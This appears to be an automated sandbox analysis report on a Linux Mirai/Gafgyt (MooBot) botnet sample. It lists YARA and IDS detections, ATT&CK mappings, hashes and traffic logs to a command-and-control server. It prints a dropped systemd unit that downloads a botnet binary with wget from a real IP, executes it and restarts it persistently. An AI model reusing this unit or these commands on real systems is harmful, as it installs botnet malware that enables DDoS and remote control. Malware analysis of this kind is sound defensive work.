              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_0cd591cd os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 96c4ff70729ddb981adafd8c8277649a88a87e380d2f321dff53f0741675fb1b, id = 0cd591cd-c348-4c3a-a895-2063cf892cda, last_modified = 2021-09-16
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_33b4111a reference_sample = 01da73e0d425b4d97c5ad75c49657f95618b394d09bd6be644eb968a3b894961, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 9c3b63b9a0f54006bae12abcefdb518904a85f78be573f0780f0a265b12d2d6e, id = 33b4111a-e59e-48db-9d74-34ca44fcd9f5, last_modified = 2021-09-16
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Gafgyt_a33a8363 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Gafgyt, fingerprint = 74f964eaadbf8f30d40cdec40b603c5141135d2e658e7ce217d0d6c62e18dd08, id = a33a8363-5511-4fe1-a0d8-75156b9ccfc7, last_modified = 2021-09-16
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_520deeb8 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = f4dfd1d76e07ff875eedfe0ef4f861bee1e4d8e66d68385f602f29cc35e30cca, id = 520deeb8-cbc0-4225-8d23-adba5e040471, last_modified = 2021-09-16
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_6a77af0f os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 4e436f509e7e732e3d0326bcbdde555bba0653213ddf31b43cfdfbe16abb0016, id = 6a77af0f-31fa-4793-82aa-10b065ba1ec0, last_modified = 2021-09-16
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_01e4a728 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = d90477364982bdc6cd22079c245d866454475749f762620273091f2fab73c196, id = 01e4a728-7c1c-479b-aed0-cb76d64dbb02, last_modified = 2021-09-16
              Source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORYMatched rule: Linux_Trojan_Mirai_e0cf29e2 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Mirai, fingerprint = 3f124c3c9f124264dfbbcca1e4b4d7cfcf3274170d4bf8966b6559045873948f, id = e0cf29e2-88d7-4aa4-b60a-c24626f2b246, last_modified = 2021-09-16
              Source: classification engineClassification label: mal100.troj.linELF@0/2@32/0
              Source: /tmp/na.elf (PID: 5454)Shell command executed: sh -c "systemctl enable sbolo.service > /dev/null 2>&1"Jump to behavior
              Source: /bin/sh (PID: 5455)Systemctl executable: /usr/bin/systemctl -> systemctl enable sbolo.serviceJump to behavior

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: na.elf, type: SAMPLE
              Source: Yara matchFile source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: na.elf, type: SAMPLE
              Source: Yara matchFile source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: na.elf PID: 5452, type: MEMORYSTR
              Source: Yara matchFile source: na.elf, type: SAMPLE
              Source: Yara matchFile source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: na.elf PID: 5452, type: MEMORYSTR

              Remote Access Functionality

              barindex
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: TrafficSuricata IDS: ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)
              Source: Yara matchFile source: na.elf, type: SAMPLE
              Source: Yara matchFile source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: na.elf, type: SAMPLE
              Source: Yara matchFile source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: na.elf PID: 5452, type: MEMORYSTR
              Source: Yara matchFile source: na.elf, type: SAMPLE
              Source: Yara matchFile source: 5452.1.0000000000400000.000000000041c000.r-x.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: na.elf PID: 5452, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information2
              Scripting
              Valid AccountsWindows Management Instrumentation1
              Systemd Service
              1
              Systemd Service
              Direct Volume AccessOS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Non-Standard Port
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job2
              Scripting
              Boot or Logon Initialization ScriptsRootkitLSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media1
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive1
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              No configs have been found
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Number of created Files
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528129 Sample: na.elf Startdate: 07/10/2024 Architecture: LINUX Score: 100 20 yi0key.heleh.com.vn 91.200.103.117, 23561, 60012, 60014 COMBAHTONcombahtonGmbHDE Germany 2->20 22 daisy.ubuntu.com 2->22 24 Suricata IDS alerts for network traffic 2->24 26 Malicious sample detected (through community Yara rule) 2->26 28 Detected Mirai 2->28 30 6 other signatures 2->30 8 na.elf 2->8         started        10 systemd snapd-env-generator 2->10         started        signatures3 process4 process5 12 na.elf sh 8->12         started        14 na.elf 8->14         started        16 na.elf 8->16         started        process6 18 sh systemctl 12->18         started       
              SourceDetectionScannerLabelLink
              na.elf58%ReversingLabsLinux.Backdoor.Mirai
              na.elf100%Joe Sandbox ML
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              NameIPActiveMaliciousAntivirus DetectionReputation
              daisy.ubuntu.com
              162.213.35.25
              truefalse
                unknown
                yi0key.heleh.com.vn
                91.200.103.117
                truetrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://91.200.103.117/%sna.elffalse
                    unknown
                    http://91.200.103.117/bolubotnetx86_64na.elf, 5452.1.00000000016e2000.00000000016e4000.rw-.sdmp, sbolo.service.12.drfalse
                      unknown
                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs
                      IPDomainCountryFlagASNASN NameMalicious
                      91.200.103.117
                      yi0key.heleh.com.vnGermany
                      30823COMBAHTONcombahtonGmbHDEtrue
                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      91.200.103.117na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                        na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                          na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                            na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              daisy.ubuntu.comna.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.25
                              na.elfGet hashmaliciousGafgytBrowse
                              • 162.213.35.25
                              na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              • 162.213.35.24
                              na.elfGet hashmaliciousGafgytBrowse
                              • 162.213.35.25
                              na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              • 162.213.35.25
                              na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              • 162.213.35.24
                              na.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.25
                              na.elfGet hashmaliciousUnknownBrowse
                              • 162.213.35.25
                              na.elfGet hashmaliciousGafgytBrowse
                              • 162.213.35.25
                              na.elfGet hashmaliciousGafgytBrowse
                              • 162.213.35.24
                              yi0key.heleh.com.vnna.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              • 91.200.103.117
                              na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              • 91.200.103.117
                              na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              • 91.200.103.117
                              na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              • 91.200.103.117
                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                              COMBAHTONcombahtonGmbHDEna.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              • 91.200.103.117
                              na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              • 91.200.103.117
                              na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              • 91.200.103.117
                              na.elfGet hashmaliciousMirai, Gafgyt, Moobot, OkiruBrowse
                              • 91.200.103.117
                              7QiAmg58Jk.exeGet hashmaliciousMetasploit, Meterpreter, XmrigBrowse
                              • 194.59.31.31
                              file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                              • 194.59.31.225
                              9YOOBuBZtj.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 194.59.30.201
                              6Zx9GI028y.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 194.59.30.201
                              4ZVhm9dOfO.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 194.59.30.201
                              y4FSQMICGJ.exeGet hashmaliciousScreenConnect ToolBrowse
                              • 194.59.30.201
                              No context
                              No context
                              Process:/tmp/na.elf
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):299
                              Entropy (8bit):5.12849862339047
                              Encrypted:false
                              SSDEEP:6:z80WuKyRZAMzdK+ann0RJ5R0a+GWRo3N+GWRuwuOp+GWRQCdUO9LQmWA4Rv:zNRZAOK+aniRJ+GWRg+GWRuwjp+GWRut
                              MD5:C682687F0E51823E3582ECEC267221B7
                              SHA1:051373AD52580939B63911E06AF69164EE8698C2
                              SHA-256:C4D124C17EF76CD568EE4A5471AB068FE9EF0273A9A371C884A5F5A4F3B78096
                              SHA-512:0035EF8123F5DFF42F7FDEA6A0950FC21EC64EE919E4E7FDA41D98A468D91266EFB55939AB8445F3E0437DEF873DC2B63BA1C1F7E989474EA89D03BFEEB7A430
                              Malicious:false
                              Reputation:low
                              Preview:[Unit].Description=Custom Sech Binary.After=network.target..[Service].ExecStart=/usr/bin/wget -O /tmp/bolu http://91.200.103.117/bolubotnetx86_64.ExecStartPost=/bin/chmod +x /tmp/bolu.ExecStartPost=/tmp/bolu (null).ExecStartPost=rm -rf /tmp/bolu.Restart=always..[Install].WantedBy=multi-user.target.
                              Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                              File Type:ASCII text
                              Category:dropped
                              Size (bytes):76
                              Entropy (8bit):3.7627880354948586
                              Encrypted:false
                              SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                              MD5:D86A1F5765F37989EB0EC3837AD13ECC
                              SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                              SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                              SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                              Malicious:false
                              Reputation:moderate, very likely benign file
                              Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                              File type:ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, stripped
                              Entropy (8bit):5.2944297938746425
                              TrID:
                              • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                              File name:na.elf
                              File size:149'016 bytes
                              MD5:535cff3a16d579f89346b0916110d25e
                              SHA1:a6f65c0f3be7ee71b23973624c60f89ce3bf8f3b
                              SHA256:c6be94538af0c32feb17a797fb510bac68f85310700df4b84ea6bb31aa5b5bf2
                              SHA512:9de76ca947b8a6fb5346d2ca39f8a5876de0ce537213e7c39ab1217cd940361ddbc00bf04d04c68acff9ad1f0f4fbf435a57732197dff6a519c64a08282a666c
                              SSDEEP:3072:fJcU1mYFZwN16ktf9BJa5+IDyiExF3Ht+WNOSbqgHv9uHLWB2O/:RcU1HFiN16krMVqd3kkEY2O/
                              TLSH:98E3390BB5C084FDC4DAC1B44BAEF23AD972F46C1238B26B27C4AA265E4DE305F5D615
                              File Content Preview:.ELF..............>.......@.....@........C..........@.8...@.......................@.......@...............................................Q.......Q.....p.......8...............Q.td....................................................H...._....Z...H........

                              ELF header

                              Class:ELF64
                              Data:2's complement, little endian
                              Version:1 (current)
                              Machine:Advanced Micro Devices X86-64
                              Version Number:0x1
                              Type:EXEC (Executable file)
                              OS/ABI:UNIX - System V
                              ABI Version:0
                              Entry Point Address:0x400194
                              Flags:0x0
                              ELF Header Size:64
                              Program Header Offset:64
                              Program Header Size:56
                              Number of Program Headers:3
                              Section Header Offset:148376
                              Section Header Size:64
                              Number of Section Headers:10
                              Header String Table Index:9
                              NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                              NULL0x00x00x00x00x0000
                              .initPROGBITS0x4000e80xe80x130x00x6AX001
                              .textPROGBITS0x4001000x1000x182860x00x6AX0016
                              .finiPROGBITS0x4183860x183860xe0x00x6AX001
                              .rodataPROGBITS0x4183a00x183a00x31400x00x2A0032
                              .ctorsPROGBITS0x51b4e80x1b4e80x180x00x3WA008
                              .dtorsPROGBITS0x51b5000x1b5000x100x00x3WA008
                              .dataPROGBITS0x51b5200x1b5200x8e380x00x3WA0032
                              .bssNOBITS0x5243600x243580xf2c00x00x3WA0032
                              .shstrtabSTRTAB0x00x243580x3e0x00x0001
                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                              LOAD0x00x4000000x4000000x1b4e00x1b4e06.37770x5R E0x100000.init .text .fini .rodata
                              LOAD0x1b4e80x51b4e80x51b4e80x8e700x181380.22950x6RW 0x100000.ctors .dtors .data .bss
                              GNU_STACK0x00x00x00x00x00.00000x6RW 0x8
                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                              2024-10-07T16:23:18.977987+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136001291.200.103.11723561TCP
                              2024-10-07T16:23:23.800327+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136001491.200.103.11723561TCP
                              2024-10-07T16:23:28.351917+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136001691.200.103.11723561TCP
                              2024-10-07T16:23:35.989973+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136001891.200.103.11723561TCP
                              2024-10-07T16:23:47.820418+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136002091.200.103.11723561TCP
                              2024-10-07T16:23:56.446305+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136002291.200.103.11723561TCP
                              2024-10-07T16:24:08.113075+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136002491.200.103.11723561TCP
                              2024-10-07T16:24:10.727857+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136002691.200.103.11723561TCP
                              2024-10-07T16:24:15.442946+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136002891.200.103.11723561TCP
                              2024-10-07T16:24:18.156729+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136003091.200.103.11723561TCP
                              2024-10-07T16:24:21.784212+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136003291.200.103.11723561TCP
                              2024-10-07T16:24:32.795048+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136003491.200.103.11723561TCP
                              2024-10-07T16:24:43.413248+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136003691.200.103.11723561TCP
                              2024-10-07T16:24:49.061773+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136003891.200.103.11723561TCP
                              2024-10-07T16:24:52.790287+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136004091.200.103.11723561TCP
                              2024-10-07T16:24:59.417908+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136004291.200.103.11723561TCP
                              2024-10-07T16:25:08.087657+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136004491.200.103.11723561TCP
                              2024-10-07T16:25:12.768389+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136004691.200.103.11723561TCP
                              2024-10-07T16:25:22.401937+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136004891.200.103.11723561TCP
                              2024-10-07T16:25:25.059438+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136005091.200.103.11723561TCP
                              2024-10-07T16:25:33.713552+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136005291.200.103.11723561TCP
                              2024-10-07T16:25:43.368163+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136005491.200.103.11723561TCP
                              2024-10-07T16:25:51.012679+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136005691.200.103.11723561TCP
                              2024-10-07T16:26:02.655537+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136005891.200.103.11723561TCP
                              2024-10-07T16:26:12.352464+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136006091.200.103.11723561TCP
                              2024-10-07T16:26:19.445450+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136006291.200.103.11723561TCP
                              2024-10-07T16:26:29.074585+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136006491.200.103.11723561TCP
                              2024-10-07T16:26:39.705358+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136006691.200.103.11723561TCP
                              2024-10-07T16:26:46.292582+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136006891.200.103.11723561TCP
                              2024-10-07T16:26:48.948300+02002030490ET MALWARE ELF/MooBot Mirai DDoS Variant CnC Checkin M1 (Group String Len 1)1192.168.2.136007091.200.103.11723561TCP
                              TimestampSource PortDest PortSource IPDest IP
                              Oct 7, 2024 16:23:18.971050024 CEST6001223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:18.976790905 CEST235616001291.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:18.976841927 CEST6001223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:18.977987051 CEST6001223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:18.983072996 CEST235616001291.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:20.584208965 CEST235616001291.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:20.584274054 CEST6001223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:20.589231968 CEST235616001291.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:23.713038921 CEST6001423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:23.717952967 CEST235616001491.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:23.718280077 CEST6001423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:23.800327063 CEST6001423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:23.805636883 CEST235616001491.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:25.334641933 CEST235616001491.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:25.334829092 CEST6001423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:25.339783907 CEST235616001491.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:28.345509052 CEST6001623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:28.350739956 CEST235616001691.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:28.350811958 CEST6001623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:28.351917028 CEST6001623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:28.357064009 CEST235616001691.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:29.974560022 CEST235616001691.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:29.974834919 CEST6001623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:29.979707956 CEST235616001691.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:35.984297037 CEST6001823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:35.989315033 CEST235616001891.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:35.989366055 CEST6001823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:35.989973068 CEST6001823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:35.994754076 CEST235616001891.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:37.653223038 CEST235616001891.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:37.653527021 CEST6001823561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:37.658499956 CEST235616001891.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:47.814318895 CEST6002023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:47.819235086 CEST235616002091.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:47.819319010 CEST6002023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:47.820417881 CEST6002023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:47.825752020 CEST235616002091.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:49.430105925 CEST235616002091.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:49.430381060 CEST6002023561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:49.435735941 CEST235616002091.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:56.440587997 CEST6002223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:56.445512056 CEST235616002291.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:56.445579052 CEST6002223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:56.446305037 CEST6002223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:56.451242924 CEST235616002291.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:58.097121954 CEST235616002291.200.103.117192.168.2.13
                              Oct 7, 2024 16:23:58.097431898 CEST6002223561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:23:58.102606058 CEST235616002291.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:08.107471943 CEST6002423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:08.112365961 CEST235616002491.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:08.112412930 CEST6002423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:08.113075018 CEST6002423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:08.117831945 CEST235616002491.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:09.708200932 CEST235616002491.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:09.708465099 CEST6002423561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:09.713282108 CEST235616002491.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:10.721968889 CEST6002623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:10.726747990 CEST235616002691.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:10.726805925 CEST6002623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:10.727857113 CEST6002623561192.168.2.1391.200.103.117
                              Oct 7, 2024 16:24:10.732708931 CEST235616002691.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:12.426966906 CEST235616002691.200.103.117192.168.2.13
                              Oct 7, 2024 16:24:12.427237988 CEST6002623561192.168.2.1391.200.103.117
